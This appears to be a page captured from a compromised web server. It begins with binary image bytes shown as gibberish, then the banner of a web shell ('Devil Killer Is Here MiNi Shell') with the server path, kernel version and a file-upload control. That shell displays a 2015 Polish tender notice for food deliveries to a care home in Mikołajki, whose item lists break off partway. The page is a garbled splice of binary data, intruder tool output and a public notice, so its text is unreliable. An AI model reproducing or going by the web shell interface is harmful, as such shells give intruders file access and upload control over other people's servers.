JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150120/13296-N-2015.html

<p class="kh_header"><b>Mikołajki: Dostawa  artykułów żywnościowych do Ewangelickiego Domu Opieki ARKA Parafii   Ewangelicko-Augsburskiej  Św. Trójcy w  Mikołajkach</b><br>
<b>Numer ogłoszenia: 13296 - 2015; data zamieszczenia: 20.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ewangelicki Dom Opieki ARKA Parafii Ewangelicko-Augsburskiej im. Św. Trójcy , Plac Kościelny 5A, 11-730 Mikołajki, woj. warmińsko-mazurskie, tel. 87 4216-811, faks 87 4215-049.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arka.itmikolajki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ewangelicki Dom Opieki.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  artykułów żywnościowych do Ewangelickiego Domu Opieki ARKA Parafii   Ewangelicko-Augsburskiej  Św. Trójcy w  Mikołajkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych  do Ewangelickiego Domu Opieki ARKA Parafii Ewangelicko-Augsburskiej  Św. Trójcy w Mikołajkach w okresie od 01 marca 2015 do 29 lutego 2016 roku zgodnie z  wykazem zamieszczonym w grupach I- VII.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 03.11.00.00-5, 15.50.00.00-3, 03.14.25.00-3, 15.10.00.00-9, 15.11.20.00-6, 15.22.00.00-6, 15.98.00.00-1, 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.02.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arka.itmikolajki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ewangelicki Dom Opieki ARKA Parafii Ewangelicko - Augsburskiej Św. Trójcy Plac Kościelny 5A, 11-730 Mikołajki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2015 godzina 08:30, miejsce: Ewangelicki Dom Opieki ARKA Parafii Ewangelicko-Augsburskiej  Św. Trójcy
Plac Kościelny 5A,  11-730 Mikołajki - księgowość.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka tarta 500g szt 150,Bułka drożdżowa 100g szt 300,
Bułka drożdżowa z jabłkiem 100g Szt 300,
Bułka poznańska 90g Szt.17000,
Bułka maślana 80g Szt 500,
Chleb razowy krojony 450g szt 350,
Chleb ziarnisty krojony 600g szt 300,
Chleb orkiszowy 500g krojony szt 430,
Chleb zwykły krojony 1kg Szt 6000,
Chleb ziołowy 350g Szt 80,
Drożdże 500g Kg 1,Eklerki 100g Szt 300,
Ciasto owocowe Kg 5,
Pączek z marmoladą Szt 300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas 
szt

15
Arbuz (sezon)
kg

250
Banan
kg

1100
Botwina pęczek
szt

80
Brzoskwinie
kg

80
Buraki czerwone
kg

800
Cebula biała
kg

750
Cebula czerwona
kg

10
Czosnek główka
szt

210
Czosnek 
Kg

5
Cytryna
Kg

350
Czereśnie (sezon)
Kg

40
Fasola szparagowa
kg

25
Granat
szt

5
Gruszki (sezon)
Kg

350
Grejpfrut czerwony
Kg

110
Jabłka
Kg

1500
Kapusta młoda
Szt

50
Kapusta biała
Kg

900
Kapusta czerwona
Kg

125
Kapusta kwaszona
Kg

550
Kapusta pekińska
Kg

230
Kalafior
Szt

60
Kiwi 
Kg

30
Kiwi
szt

350
Koper pęczek 50g
Szt

600
Mak niebieski
Kg

4
Marchew 
kg

1200
Mandarynka 
Kg

350
Nektarynka
Kg

50
Ogórek świeży
Kg

450
Ogórki gruntowe
Kg

30
Ogórki małosolne
Kg

50
Ogórki kwaszone
Kg

200
Por
Szt

800
Papryka
kg

150
Pomidory 
Kg

800
Pomarańcza
Kg

370
Pietruszka korzeń
Kg

10
Pietruszka nać 50g
Szt

350
Pieczarki
Kg

170
Rodzynki 
Kg

11
Rzodkiewka 100g
Szt

320
Rzodkiew biała
Kg

70
Szczypiorek pęczek 50g
Szt

380
Seler
Kg

400
Sałata masłowa
szt

250
Sałata lodowa
szt

300
Śliwki(sezon)
kg

100
Truskawka (sezon)
Kg

120
Winogrona ciemne
Kg

80
Winogrona jasne
kg

80
Wiśnie (sezon)
Kg

10
Ziemniak młody
Kg

3500
Ziemniak Irga
Kg

8000
Zestaw do  kiszenia
Szt

10
Grzyby suszone podgrzybki/borowiki 50g
Szt

10
Grzyby suszone podgrzybki/borowiki 20g
szt

20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Napój mleczny zawierający bakterie jogurtowe Actimel lub równoważny 4x100g
op

25
Jogurt naturalny 150g
Szt.

700
Jogurt naturalny 350g
Szt

80
Jogurt owocowy 150g
Szt.

2100
Jogurt owocowy 350g
Szt.

50
Masło extra 200g
Szt.

150
Mleko skondensowane słodzone puszka 400ml
Szt.

10
Mleko karton 2% 1l
Szt

500
Maślanka naturalna 1l
Szt.

250
Maślanka owocowa 1l
Szt.

50
Margaryna extra z masłem 500g Delma lub równoważna
szt

2000
Margaryna 500g o zawart.tł.min 39% typu Rama 
szt

610
Margaryna do pieczenia Kasia 250g lub równoważna
szt

50
Ser Feta 270g
Szt.

70
Serek waniliowy Danio 150 g lub równoważny  
Szt.

4000
Ser żółty edamski/gouda
Kg

320
Ser pleśniowy 125g President Camembert lub równoważny
Szt

100
Ser wędzony
Kg

12
Serek  typu wiejski 200g
Szt

750
Serek 135g Twój Smak lub równoważny
Szt

950
Śmietana 30% 500ml 
Szt

70
Śmietana 18% 400g
Szt

1300
Twaróg chudy 250g
Szt

900
Twaróg tłusty 250g
Szt

30
Twaróg półtłusty 250g
Szt

140
Twaróg sernikowy 1kg
Szt

20
Valbon brie 200g pleśniowy lub równoważny
Szt

50
Ser mozzarella 125g
szt

200
Serek Hochland zegarek lub równoważny 200g
Szt

580.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> jaja kurze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze klasa A waga M
szt

23000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Baleron wp wędzony
kg

30
Boczek wp szeroki
kg

30
Boczek bk surowy
kg

130
Boczek wiejski
kg

5
Boczek wędzony gotowany
kg

220
Ćwiartki kurczęce tylne schłodzone
kg

530
Filet kurczęcy schłodzony bs
kg

620
Filet z indyka wędzony
kg

8
Flaki wołowe krojone mrożone 0,90
op

100
Głowa surowa wp
kg

10
Golonka konserwowa
kg

35
Golonka surowa tylna wp
kg

75
Gulasz angielski
kg

50
Gulasz angielski 300g PEK
szt

10
Indyk faszerowany
kg

200
Jelita cienkie wp
szt

80
Karkówka wp bk
kg

260
Kaszanka
kg

150
Kiełbasa biała parzona wp średnio rozdrobniona
kg

80
Kiszka ziemniaczana
kg

30
Krew wieprzowa
l

3
Kiełbasa pieprzowa
kg

30
Kiełbasa jałowcowa
kg

20
Kiełbasa jasiuk - kiełbasa wieprzowa grubo rozdrobniona, wędzona, w której100g produktu wytworzono ze 125g mięsa wieprzowego


kg

50
Kiełbasa krakowska parzona - kiełbasa średnio rozdrobniona, parzona wędzona
kg

250
Kiełbasa krakowska sucha  , kiełbasa wieprzowa grubo rozdrobniona, wędzona, parzona, suszona, w której na 100g wyrobu gotowego zużyto min.143g mięsa wieprzowego 
kg

50
Kiełbasa madera - kiełbasa wp średnio rozdrobniona wysokowydajna, w której skład wchodzi min. 76%  mięsa wieprzowego
kg

550
Kiełbasa parówkowa
kg

150
Kiełbasa piwna
kg

25
Kiełbasa swojska wędzona
kg

20
Kiełbasa swojska z cielęciną - kiełbasa wieprzowa z dodatkiem cielęciny średnio rozdrobniona, wędzona , parzona, w której na 100 g produktu użyto min. 115,4 g mięsa wieprzowego i min. 2,3g cielęciny
Kg

70
Kiełbasa szynkowa parzona
Kg

22
Kiełbasa szynkowa borowiaka- wędzonka grubo rozdrobniona, parzona z mięsa wieprzowego, w której do wyprodukowania 100g produktu użyto 106g mięsa wieprzowego


kg

10
Kiełbasa czosnkowa - kiełbasa wieprzowa, średnio rozdrobniona, wysokowydajna, wędzona, parzona 
mięso wieprzowe min.74%
kg

60
Kiełbasa ukraińska
kg

160
Kiełbasa z piersi kurczaka
kg

10
Kiełbasa z szynki
Kg

8
Kiełbasa żywiecka sucha
kg

60 
Kiełbasa żywiecka podsuszana
kg

60
Kości wp schabowe
kg

70
Kura w galarecie
kg

100
Kurczak świeży
kg

220
Lunchmeat 
kg

53
Łopatka surowa wp bk
kg

440
Metka cebulowa
kg

30
Metka tatarska 180g
szt

50
Metka łososiowa
kg

30
Mielonka śniadaniowa
kg

70
Mielonka tyrolska
kg

15
Mięso mielone
Kg

10
Mortadela luksusowa
kg

60
Nogi wp
kg

30
Ogonówka wędzona parzona
kg

15
Ozory wp
kg

30
Parówki Berlinetki
kg

250
Parówki maślane
Kg

75
Pasztet pieczony wp blaszka
kg

80
Pasztet pieczony drobiowy
kg

10
Pasztetowa drobiowa
kg

150
Pasztetowa 
Kg

10
Pieczeń czosnkowa
kg

18
Pieczeń z piersi kurczaka
Kg

7
Pieczeń litewska
kg

27
Pieczeń rzymska
kg

140
Porcje rosołowe
kg

1000
Podgardle wp surowe
kg

15
Polędwica wędzona
kg

20
Polędwica sopocka wp, wędzona, parzona, w której skład wchodzi min. 58% mięsa wieprzowego
kg

120
Polędwica sopocka drobiowa
Kg

10
Polędwica drobiowa
kg

135
Polędwica wiśniowa wp, wędzona, parzona, w której skład wchodzi min. 65% mięsa wieprzowego
kg

         80
Przekładaniec grecki
kg

25
Przysmak wojskowy-wędlina drobiowa blokowa wieprzowa wyprodukowana z min.16%mięsa z kurczaka
kg

5
Polędwica miodowa
kg

20
Polędwica z warzywami
kg

20
Rolada drobiowa z kurczaka
kg

27
Salami bumerang
kg

35
Salceson włoski
kg

23
Salceson z ziołami
kg

10
Salceson drobiowy
kg

35
Schab pieczony- wędzonka wysokowydajna wieprzowa, wędzona, parzona wyprodukowana z 64% mięsa wieprzowego
kg

190
Schab wędzony
kg

15
Schab krotoszyński
kg

10
Schab z liściem
kg

15
Schab po żydowsku
Kg

20
Schab surowy wp bk
kg

200
Serca wp  surowe
kg

5
Serca drobiowe surowe
kg

25
Serdelki 
kg

90
Skrzydła kurczęce schłodzone
kg

470
Słonina wp surowa
kg

40
Smalec wp 200g
szt

600
Smalec wp
Kg

35
Szynka bankietowa
kg

35
Szynka wp surowa bk
kg

400
Szynka wp gotowana
kg

10
Szynka wędzona - szynka wp wędzona, parzona, w której skład wchodzi min.70% mięsa wieprzowego
kg

55
Szynka konserwowa wp
kg

140
Szynka wędzona z liściem w której skład wchodzi min.85%szynki wieprzowej, wędzona,parzona
kg

60
Szynka domowa
kg

10
Szynka bohuna wp wysokowydajna, wędzona,parzona, w której skład wchodzi min.72% mięsa wieprzowego
kg

40
Szynka chłopska
kg

20
Szynkowa luksusowa-wędlina drobiowa z dodatkiem surowca wieprzowego, grubo rozdrobniona, w której skład wchodzi min 51% mięsa z indyka
Kg

170
Udziec wołowy-zrazowa górna
kg

10
Udziec indyczy
Kg

60
Wątroba świeża wp
kg

3
Wątroba świeża drobiowa 
kg

120
Wędzonka chłopska
kg

100
Żeberka wp paski
kg

240
Żołądki drobiowe świeże
kg

40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Morszczuk filet o maksymalnej zawartości glazury do 15%
Kg

380
Płat śledziowy solony bez skory 4kg
Szt

60
Makrela wędzona
kg

80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> art. ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas kostka 3050g
szt

15
Ananas plastry 565g w syropie
Szt

10
Aromat do ciast 5g
Szt

10
Bazylia suszona 300g
Szt

3
Barszcz ukraiński mrożony 2,5kg
szt

160
Brokuł różyczki mrożony 2,5kg
szt

7
Brzoskwinia połówki w syropie 820g puszka
szt

250
Budyń 1 kg mix
szt

45
Budyń 41g mix
szt

40
Chrzan tarty na kwasku cytrynowym 170g
szt

40
Ciastka krakersy 200g
szt

100
Ciastka biszkopty 1kg
szt

40
Ciastka biszkopty z galaretką 135g
szt

500
Ciastka biszkopty 350g
szt

15
Ciastka kruche bez czekolady z marmoladą 2,5kg
szt

3
Ciastka pierniki w czekoladzie 2,5kg
szt

3
Ciastka herbatniki 100g
Szt

130
Ciastka różne 1,5kg
Szt

5
Cukier biały kryształ
kg

1500
Cukier puder 500g
szt

10
Cukier waniliowy 32g
szt

250
Cynamon mielony 40g
szt

5
Cynamon mielony 20g
Szt

70
Czekolada mleczna 100g
szt

500
Czekolada gorzka 100g
szt

70
Czekolada biała 100g
szt

30
Czekolada nadziewana 100g truskawkowa
szt

160
Czosnek granulowany 500g
szt

7
Cząstka ziemniaka ze skórką mrożone
kg

5
Ćwikła z chrzanem 260g
Szt

20
Degusta 5kg lub równoważna
szt

20
Dżem niskosłodzony 260g mix
szt

650
Fasola sucha biała 5kg
op

15
Fasola drobna 5kg
Szt

1
Fasola konserwowa czerwona 400g
szt

60
Fasola żółta  mrożona luz
kg

50
Galaretka owocowa mix 75g
szt

150
Groch suchy łuskany połówki 5kg
szt

15
Groszek konserwowy 400g
szt

25
Groszek mrożony 2,5kg
szt

10
Herbata ex a 300 Saga lub równoważna
szt

210
Herbata ex miętowa a20
szt

50
Herbata owocowa ex a30 Saga lub równoważna
szt

40
Jajko czekoladowe 25g
Szt

100
Kakao Decomorreno 200g lub równoważne
szt

28
Kakao Puchatek 450g lub równoważne
szt

20
Kakao Puchatek 300g torebka lub równoważne
Szt

70
Kalafior mrożony 2,5kg
szt

35
Kasza jęczmienna gruba 5kg
szt

10
Kasza jęczmienna średnia 500g
szt

80
Kasza wiejska średnia 1kg
Kg

35
Kasza wiejska 500g
Szt

20
Kasza manna 1kg
szt

230
Kaszka ryżowa bez mleczna 180g
szt

165
Kawa naturalna mielona 500g
szt

20
Kawa naturalna mielona 250g
szt

15
Kawa zbożowa 500g
Szt

25
Ketchup łagodny Kotlin 1kg  lub równoważny
szt

5
Ketchup pikantny Kotlin 1kg lub równoważny
szt

50
Kisiel 1kg
szt

50
Kompot mix 900ml
szt

150
Koncentrat pomidorowy Knorr 800g lub równoważny
szt

90
Kukurydza konserwowa 400g
szt

210
Kminek 20g
Szt

25
Kwasek cytrynowy 1kg
szt

3
Liść laurowy 1kg
szt

1
Liść laurowy 500g
Szt

3
Majonez 815 g(skład:olej roślinny rzepakowy 63%,woda, musztarda,żółtka jaj 6%,cukier)Kętrzyński lub równoważny
szt

140
Majeranek 100g
Szt

10
Majeranek 400g
szt

2
Makaron kolanka 3kg
szt

1
Makaron kolanka 1kg
szt

50
Makaron nitka 1kg
szt

70
Makaron nitka 3kg
szt

5
Makaron rurki 3kg
szt

6
Makaron świderki 3kg
szt

1
Makaron świderki 1 kg
Szt

50
Mąka ziemniaczana
kg

120
Mąka tortowa typ 450
kg

300
Mąka luksusowa typ 550
kg

450
Mieszanka warzywna mrożona 7-składnikowa 2,5kg
szt

470
Miód
l

60
Marchewka z groszkiem konserwowa 460g
szt

300
Mieszanka kompotowa 5-składnikowa 2,5kg
